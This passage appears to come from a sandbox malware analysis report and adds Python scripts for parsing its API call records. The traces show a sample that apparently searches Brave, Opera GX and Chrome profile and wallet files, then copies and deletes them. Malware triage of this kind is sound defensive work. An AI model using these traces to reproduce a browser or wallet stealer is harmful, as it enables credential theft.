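The two API records above (the GetProcessHeap/HeapAlloc/GetComputerNameA routine and the malloc/lstrlen/lstrcpy routine) are the lines a triage analyst actually mines: the call list gives each function a signature, and the "Part of subcall function" lines expose one level of the call graph (here 0019BBB1 runs lstrlenA, malloc, lstrcpyA in sequence, i.e. a string-duplication helper). The Python below is an added example, not Joe Sandbox's own code, that parses these lines into structured calls, recovers the helper addresses, and rebuilds the record's API ID so functions can be clustered across samples. The API ID rule it applies (drop a leading Get and a trailing A/W, split CamelCase into words, put words seen more than once before a "$", sort both groups) is inferred from the three IDs on this page and is an assumption about the tool, checked only against those records; the input is constructed from the report lines above.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed input: the "APIs" lines of two function records from this report, copied as
# they appear above. An indented "Part of subcall function" line is a call the report saw
# inside a helper that the record's own function invokes (one level of the call graph).
SAMPLE = """\
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00181385), ref: 00190C66
• HeapAlloc.KERNEL32(00000000,?,?,?,00181385), ref: 00190C6D
• GetComputerNameA.KERNEL32(00000000,00181385), ref: 00190C81
APIs
• malloc.MSVCRT ref: 0019CC0E
  • Part of subcall function 0019BBB1: lstrlenA.KERNEL32(?,0019CC1F,0019CCC1,00000000,06400000,00000003,00000000,001975C1,.exe,001B6C64,001B6C60,001B6C5C,001B6C58,001B6C54,001B6C50,001B6C4C), ref: 0019BBE3
  • Part of subcall function 0019BBB1: malloc.MSVCRT ref: 0019BBEB
  • Part of subcall function 0019BBB1: lstrcpyA.KERNEL32(00000000,?), ref: 0019BBF6
• malloc.MSVCRT ref: 0019CC4B
"""

# One call line: optional subcall prefix, Symbol.MODULE, optional (args), then "ref: <hex>".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    name: str                  # imported symbol as logged, e.g. GetComputerNameA
    module: str                # exporting module, e.g. KERNEL32
    args: Tuple[str, ...]      # argument values as printed; "?" means unresolved
    ref: int                   # call-site address
    subcall_of: Optional[int]  # helper address when the call was observed inside a subcall


def parse_api_records(text: str) -> List[List[ApiCall]]:
    """Split report text into per-function call lists, one list per 'APIs' heading."""
    records: List[List[ApiCall]] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            records.append([])
            continue
        m = CALL_RE.match(line)
        if not m or not records:
            continue  # hash, dump-source and other non-call lines are ignored
        args = tuple(m["args"].split(",")) if m["args"] is not None else ()
        records[-1].append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                                   int(m["sub"], 16) if m["sub"] else None))
    return records


def canonical_name(api: str) -> str:
    """Drop a leading 'Get' and a trailing ANSI/Unicode (A/W) suffix.

    Inferred from the three API IDs on this page, not from tool documentation (assumption)."""
    if api.startswith("Get") and api[3:4].isupper():
        api = api[3:]
    if len(api) > 1 and api[-1] in "AW" and api[-2].islower():
        api = api[:-1]
    return api


TOKEN_RE = re.compile(r"[A-Z][a-z0-9]*|[a-z0-9]+")  # CamelCase words; lowercase names stay whole


def api_id(calls: List[ApiCall]) -> str:
    """Rebuild the record's 'API ID': words seen more than once, a '$', then the rest, sorted.

    Counting is per call, so a helper called three times repeats its word (assumption)."""
    counts = Counter(tok for c in calls for tok in TOKEN_RE.findall(canonical_name(c.name)))
    repeated = "".join(sorted(t for t, n in counts.items() if n > 1))
    single = "".join(sorted(t for t, n in counts.items() if n == 1))
    return f"{repeated}${single}" if repeated else single


def helper_addresses(calls: List[ApiCall]) -> List[int]:
    """Helpers whose inner calls the report attributes to this function (call-graph edges)."""
    return sorted({c.subcall_of for c in calls if c.subcall_of is not None})


def summarize(text: str) -> List[dict]:
    """Per-function triage view: API ID, modules touched, and helper addresses to look at next."""
    return [{"api_id": api_id(r),
             "modules": sorted({c.module for c in r}),
             "helpers": [f"{a:08X}" for a in helper_addresses(r)]}
            for r in parse_api_records(text)]


if __name__ == "__main__":
    for entry in summarize(SAMPLE):
        print(entry)
```

Run stand-alone it prints one summary per record; pointed at the whole function-analysis section of a report it yields an api_id per function that can be compared across samples of the same family, and the helper addresses tell you which routines (here 0019BBB1) to open next in the dump.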
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d47c77b1794f1193cc8c4bc079dc0fb71e1deeb1ad4289a205c06f0802c0949e
• Instruction ID: d9f8ac4e723aedc6912faf6ccd02ac29ee3e05dcba009e20925ae8047e6c9455
• Opcode Fuzzy Hash: d47c77b1794f1193cc8c4bc079dc0fb71e1deeb1ad4289a205c06f0802c0949e
• Instruction Fuzzy Hash: B3516272D10200BFDF717BBD8549AB8B2D9AFB2314F160446F4148A136DF658E894E61
                                                                                                                                                                        APIs
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00191DD2
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                         • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FolderPathlstrcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1699248803-0
                                                                                                                                                                        • Opcode ID: aaa370a847d3d055293ac01beeb211b4c362f460d1e8be7856986a77934a70d4
                                                                                                                                                                        • Instruction ID: 90385fb2f9cc9c2d8e6095943f3f983c0ef0ccc80080620c62b59b42f7c252b8
                                                                                                                                                                        • Opcode Fuzzy Hash: aaa370a847d3d055293ac01beeb211b4c362f460d1e8be7856986a77934a70d4
                                                                                                                                                                        • Instruction Fuzzy Hash: F6F0BD71A10159ABDB16EF68EC519AEB7FCEB48300F0045AAB905D7251DA34AF458B90
                                                                                                                                                                        APIs
                                                                                                                                                                        • SHFileOperationA.SHELL32(?), ref: 0019254C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                         • Associated: the same 22 associated dumps (00180000 through 003F0000) listed for the function above
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileOperation
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3080627654-0
                                                                                                                                                                        • Opcode ID: ab47765b27987e0569c70115b4a0ca648844c3f45a1fc092e764b8cc60b4a1da
                                                                                                                                                                        • Instruction ID: 0c301cd70915aaa36bc3da8e5640e281ef6b934160a4b14bf600c173c7dfb55e
                                                                                                                                                                        • Opcode Fuzzy Hash: ab47765b27987e0569c70115b4a0ca648844c3f45a1fc092e764b8cc60b4a1da
                                                                                                                                                                        • Instruction Fuzzy Hash: 9AE075B0D0420D9FCB44EFA9DA452DEBBF4AB18308F004169C115F2240E3B482458BA5
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                         • Associated: the same 22 associated dumps (00180000 through 003F0000) listed for the function above
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: malloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2803490479-0
                                                                                                                                                                        • Opcode ID: 802f3fefc47a25a5f42da4a5c7361ad6c6daf9ad106be494594426d9b3157711
                                                                                                                                                                        • Instruction ID: a8508a59ff43476860c844ac7c5ec8de1f9a66a45ca537056336b7782a064cad
                                                                                                                                                                        • Opcode Fuzzy Hash: 802f3fefc47a25a5f42da4a5c7361ad6c6daf9ad106be494594426d9b3157711
                                                                                                                                                                        • Instruction Fuzzy Hash: FB214870200710CFC720DF6ED084956B7F4FF58324B55486DE68A8B722C772E880CB42
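When triaging a report like this, the per-function "APIs" blocks are the fastest way to see what a function does before opening the dump in IDA: direct call sites in address order give the control flow, "Part of subcall function" lines belong to a callee, and argument values that fall inside the module's address range (the dumps above span 00180000 to 003F0000) are usually pointers to string constants worth looking up. The following Python is an added example written for this page, not Joe Sandbox code or output. It parses the bullet format used above; the sample block is constructed (the first two lines are copied from the SHGetFolderPathA function above, the rest and their ref addresses are hypothetical), the assumed image range 0x180000 to 0x400000 is taken from the dump list, and the capability hint table is the author's own, not something the sandbox emits.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample "APIs" block in the format this report prints for each
# function. The first two lines are copied from the SHGetFolderPathA function
# above; the remaining lines and their ref addresses are hypothetical.
SAMPLE_APIS = """\
• SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00191DD2
  • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
• wsprintfA.USER32 ref: 00191DF0
• FindFirstFileA.KERNEL32(?,?), ref: 00191E10
• StrCmpCA.SHLWAPI(?,001B6A00), ref: 00191E2C
• SHFileOperationA.SHELL32(?), ref: 00191E50
"""

# Assumed image range: the dump list above runs from 00180000 to 003F0000 for
# the module loaded at 00180000; argument values inside it are treated as
# in-image pointers (most often string constants).
IMAGE_LO, IMAGE_HI = 0x00180000, 0x00400000

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiRef:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: int                   # address of the call site
    subcall_of: Optional[int]  # callee address when listed as "Part of subcall function"


def parse_api_block(text: str) -> List[ApiRef]:
    """Parse one function's APIs block; lines that do not match are ignored."""
    refs = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = tuple(a.strip() for a in (m["args"] or "").split(",") if a.strip())
        refs.append(ApiRef(
            api=m["api"], module=m["mod"], args=args,
            ref=int(m["ref"], 16),
            subcall_of=int(m["sub"], 16) if m["sub"] else None,
        ))
    return refs


def direct_call_sequence(refs: List[ApiRef]) -> List[str]:
    """API names of the function's own call sites, in address order."""
    return [r.api for r in sorted(refs, key=lambda r: r.ref) if r.subcall_of is None]


def module_histogram(refs: List[ApiRef]) -> Counter:
    """How many calls go to each DLL / CRT module, subcalls included."""
    return Counter(r.module for r in refs)


def in_image_args(refs, lo=IMAGE_LO, hi=IMAGE_HI, include_subcalls=False):
    """(api, address) for arguments that point inside the image: candidates
    for string constants to look up in the dump. '?' means unresolved."""
    out = []
    for r in refs:
        if r.subcall_of is not None and not include_subcalls:
            continue
        for a in r.args:
            try:
                v = int(a, 16)
            except ValueError:
                continue
            if lo <= v < hi:
                out.append((r.api, v))
    return out


# Assumed triage hints keyed by API name; this table is the author's, not
# part of Joe Sandbox's output.
CAPABILITY_HINTS = {
    "SHGetFolderPathA": "resolves a CSIDL known folder such as AppData",
    "FindFirstFileA": "enumerates a directory (pair with FindNextFileA)",
    "StrCmpCA": "compares a runtime string with a constant from the image",
    "SHFileOperationA": "copies, moves or deletes files through the shell",
}


def capability_hints(refs: List[ApiRef]) -> List[Tuple[str, str]]:
    """(api, hint) for each direct call with a known hint, in address order."""
    return [(a, CAPABILITY_HINTS[a]) for a in direct_call_sequence(refs) if a in CAPABILITY_HINTS]


if __name__ == "__main__":
    refs = parse_api_block(SAMPLE_APIS)
    print(" -> ".join(direct_call_sequence(refs)))
    print(dict(module_histogram(refs)))
    for api, ptr in in_image_args(refs, include_subcalls=True):
        print(f"{api}: in-image argument at {ptr:08X}")
    for api, hint in capability_hints(refs):
        print(f"{api}: {hint}")
```

Run it on the text of any APIs block copied from the report; the in-image pointer list is the set of addresses to resolve against the 00180000 dump before reading the disassembly, since a StrCmpCA or lstrcatA whose second argument is a constant string tells you what the function is looking for without executing the sample.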
                                                                                                                                                                        APIs
                                                                                                                                                                        • wsprintfA.USER32 ref: 00194D5C
                                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00194D73
                                                                                                                                                                        • _memset.LIBCMT ref: 00194D8F
• _memset.LIBCMT ref: 00194DA0
• StrCmpCA.SHLWAPI(?,001B6A00), ref: 00194DC1
• StrCmpCA.SHLWAPI(?,001B6A04), ref: 00194DDB
• wsprintfA.USER32 ref: 00194E02
• StrCmpCA.SHLWAPI(?,001B660F), ref: 00194E16
• wsprintfA.USER32 ref: 00194E3F
• wsprintfA.USER32 ref: 00194E56
  • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
  • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
  • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
  • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
  • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
  • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
• _memset.LIBCMT ref: 00194E68
• lstrcatA.KERNEL32(?,?), ref: 00194E7D
• strtok_s.MSVCRT ref: 00194EC2
• _memset.LIBCMT ref: 00194ED4
• lstrcatA.KERNEL32(?,?), ref: 00194EE9
• strtok_s.MSVCRT ref: 00194F02
• PathMatchSpecA.SHLWAPI(?,00000000), ref: 00194F17
• DeleteFileA.KERNEL32(?,001B6A30,001B661D), ref: 00194FD0
• CopyFileA.KERNEL32(?,?,00000001), ref: 00194FE0
  • Part of subcall function 0019213B: CreateFileA.KERNEL32(00194FEC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00194FEC,?), ref: 00192156
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00194FF6
• DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 00195001
• strtok_s.MSVCRT ref: 00195027
• FindNextFileA.KERNEL32(?,?), ref: 00195145
• FindClose.KERNEL32(?), ref: 00195165
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
• String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
• API String ID: 956187361-332874205
• Opcode ID: 5b465b6ecbbaef82e6b6ce0d9d2f77677227d8efbca7cb22584214c157db25a1
• Instruction ID: b1fda84b196762db4b5f906c448288c69ba3195abc43cd2c2c47e466a0c9f56a
• Opcode Fuzzy Hash: 5b465b6ecbbaef82e6b6ce0d9d2f77677227d8efbca7cb22584214c157db25a1
• Instruction Fuzzy Hash: 0EC11C72D0022AAFDF22AB64EC459EE777DAF18304F0544A6FA09B3151DB359F858F50
APIs
  • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
  • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
  • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
  • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
  • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
  • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
  • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
• FindFirstFileA.KERNEL32(?,?,001B67F2,001B67EF,001B731C,001B67EE,?,?,?), ref: 00189D9B
• StrCmpCA.SHLWAPI(?,001B7320), ref: 00189DBC
• StrCmpCA.SHLWAPI(?,001B7324), ref: 00189DD6
  • Part of subcall function 0019051E: lstrlenA.KERNEL32(?,?,001971B6,001B66BE,001B66BB,?,?,?,?,001985D1), ref: 00190524
  • Part of subcall function 0019051E: lstrcpyA.KERNEL32(00000000,00000000,?,001971B6,001B66BE,001B66BB,?,?,?,?,001985D1), ref: 00190556
• StrCmpCA.SHLWAPI(?,Opera GX,001B7328,?,001B67F3), ref: 00189E68
• StrCmpCA.SHLWAPI(?,Brave,001B7348,001B734C,001B7328,?,001B67F3), ref: 00189FEA
• StrCmpCA.SHLWAPI(?,Preferences), ref: 0018A004
• CopyFileA.KERNEL32(?,?,00000001), ref: 0018A0C4
• DeleteFileA.KERNEL32(?), ref: 0018A193
• StrCmpCA.SHLWAPI(?), ref: 0018A1D1
• StrCmpCA.SHLWAPI(?), ref: 0018A23B
• StrCmpCA.SHLWAPI(0018CCBE), ref: 0018A24E
  • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
• StrCmpCA.SHLWAPI(?), ref: 0018A331
• CopyFileA.KERNEL32(?,?,00000001), ref: 0018A3F1
• StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0018A496
• DeleteFileA.KERNEL32(?), ref: 0018A4F7
  • Part of subcall function 00188DAC: lstrlenA.KERNEL32(?), ref: 00188FA5
  • Part of subcall function 00188DAC: lstrlenA.KERNEL32(?), ref: 00188FC0
  • Part of subcall function 0018951A: lstrlenA.KERNEL32(?), ref: 00189943
  • Part of subcall function 0018951A: lstrlenA.KERNEL32(?), ref: 0018995E
• StrCmpCA.SHLWAPI(?), ref: 0018A528
• CopyFileA.KERNEL32(?,?,00000001), ref: 0018A5E8
• DeleteFileA.KERNEL32(?), ref: 0018A67F
  • Part of subcall function 00191C1F: GetSystemTime.KERNEL32(?,001B66E2,?), ref: 00191C4E
• FindNextFileA.KERNEL32(?,?), ref: 0018A743
• FindClose.KERNEL32(?), ref: 0018A757
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: File$lstrcpylstrlen$CopyDeleteFind$lstrcat$CloseFirstNextSystemTime
• String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
• API String ID: 4173076446-1189830961
• Opcode ID: a5c6708c594dd2f02ade6c93e1a85515e160d329bee6b0a36ac9e4f603b787d9
• Instruction ID: 07dfa4fc35340fda2b81b7fa8eb573c97cc285582cfa5bc99df27967ded48e7c
• Opcode Fuzzy Hash: a5c6708c594dd2f02ade6c93e1a85515e160d329bee6b0a36ac9e4f603b787d9
• Instruction Fuzzy Hash: 2B42D4329001299FDF62BB24ED46ADD77B4AF28304F4541E1F908B7162DB74AF998F81
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
